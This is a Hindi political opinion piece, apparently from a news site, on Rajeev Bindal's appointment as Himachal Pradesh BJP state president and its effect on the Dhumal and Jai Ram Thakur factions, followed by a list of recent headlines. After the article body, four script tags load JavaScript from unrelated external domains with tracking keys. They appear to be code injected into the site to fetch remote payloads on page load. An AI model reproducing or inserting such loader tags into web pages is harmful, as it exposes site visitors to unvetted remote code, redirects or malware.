Categories: ओपिनियन

राजीव बिंदल, मतलब नफा नुकसान की राजनीतिक गणना शुरू

<p>लंबी जद्दोजहद के बाद भाजपा में आखिर प्रदेशाध्यक्ष के नाम को लेकर सहमति तो जरूर बन गई। लेकिन अब 2022 की राजनीतिक गणना की शुरुआत हो चुकी है। राजीव बिंदल की ताजपोशी में इतना तो तय है कि मुख्यमंत्री जयराम ठाकुर की सूटेबिलिटी डॉ. राजीव बिंदल को लेकर कम थी और राकेश जम्वाल या रामस्वरूप शर्मा प्रदेश अध्यक्ष बनते तो अधिक थी। मिली जानकारी के अनुसार राष्ट्रीय अध्यक्ष जगत प्रकाश नड्डा के आदेश अनुसार ही डॉ. राजीव बिंदल की नियुक्ति बतौर प्रदेशाध्यक्ष हुई है। जिसमें पूर्व मुख्यमंत्री प्रेम कुमार धूमल की रजामंदी भी पूरी तरह शामिल रही। इस तरह से अब भाजपा में डॉ राजीव बिंदल का अध्यक्ष बनने का मतलब साफ है कि कुछ चेहरे जो पूर्व मुख्यमंत्री प्रेम कुमार धूमल के साथ सीधे जुड़े हुए थे, अपना पूरा राजनीतिक वजूद होने के बाद भी अचानक जयराम के मुख्यमंत्री बनने से हाशिए पर चले गए थे। कहीं ना कहीं उन चेहरों में भी एक बार फिर से राजनीति में वापसी की आशा भी जरूर जागी हुई है।</p>

<p>बताते चलें कि मंचों के माध्यम से ही पिछले कुछ समय से धूमल ग्रुप और जयराम ठाकुर के बीच में जुबानी जंग चल रही थी और माना यह जा रहा था अगर जयराम ठाकुर अपने कोटे से प्रदेश अध्यक्ष बनाने में सक्षम हो जाते हैं तो यह जंग और अधिक राजनीतिक नुकसान भाजपा को कर सकती थी। लेकिन डॉक्टर बिंदल के अध्यक्ष बनने के साथ ही एक तरफ जहां उन्हें पूर्व मुख्यमंत्री प्रेम कुमार धूमल का साथ मिलना तय माना जा रहा है। वह इसके साथ उनके खुद के क्षमता सबको साथ लेकर चलने की भी उन्हें लाभ देती नज़र आ रही है। इसको लोग राजनीति से जुड़े लोग विशेष रूप से टिकट आबंटन के साथ भी जोड़ कर देखने लगे हैं कि जो परिस्थितियां त्रिलोक जमवाल या रामस्वरूप या राकेश जम्वाल&nbsp; के अध्यक्ष बनने से पूरे प्रदेश में बनी थी उसमें तो वन साइड टिकट आबंटन होना तय था। लेकिन अब जब एक राजनीतिक बैलेंस बनाकर अध्यक्ष की नियुक्ति हुई है तो सभी को बराबरी का मौका मिलेगा, यह कहा जा सकता है।</p>

<p>यहां यह भी कहा जा सकता है कि जगत प्रकाश नड्डा हिमाचल प्रदेश में और अधिक सशक्त होते नजर आ रहे हैं। क्योंकि एक तरफ जहां प्रदेश अध्यक्ष की कमान राजीव बिंदल के हाथ आ चुकी है, वहीं दूसरी तरफ मुख्यमंत्री के राजनीतिक सलाहकार के रूप में त्रिलोक जमवाल की उपस्थिति भी मुख्यमंत्री कार्य में कार्यालय में लगातार बनी रहेगी। जो कहीं ना कहीं हिमाचल में नड़ड़ा के लिये तीसरी आंख का काम करेगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1579244120002″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

भारत में सड़क दुर्घटनाओं को रोकने के लिए केंद्रीय कानून जरूरी: शांता कुमार

Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…

19 mins ago

Himachal: सीएम सुक्खू ने ईवीएम पर उठाए सवाल, बैलेट पेपर से चुनाव की मांग

Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…

31 mins ago

Sirmour News : तेज रफ्तार गाड़ी की टक्कर से 26 वर्षीय युवती की मौत

Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…

50 mins ago

Baba Siddique murder: बाबा सिद्दीकी सुपुर्द-ए-खाक, लॉरेंस गैंग की सलमान खान को भी नहीं छोड़ेंगे की धमकी

Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…

1 hour ago

Himachal: रथयात्रा के साथ कुल्लू दशहरा उत्सव की भव्य शुरुआत

Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…

2 hours ago

Himachal: भगवान रघुनाथ की भव्य शोभायात्रा के साथ आज शुरू होगा दशहरा

International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…

10 hours ago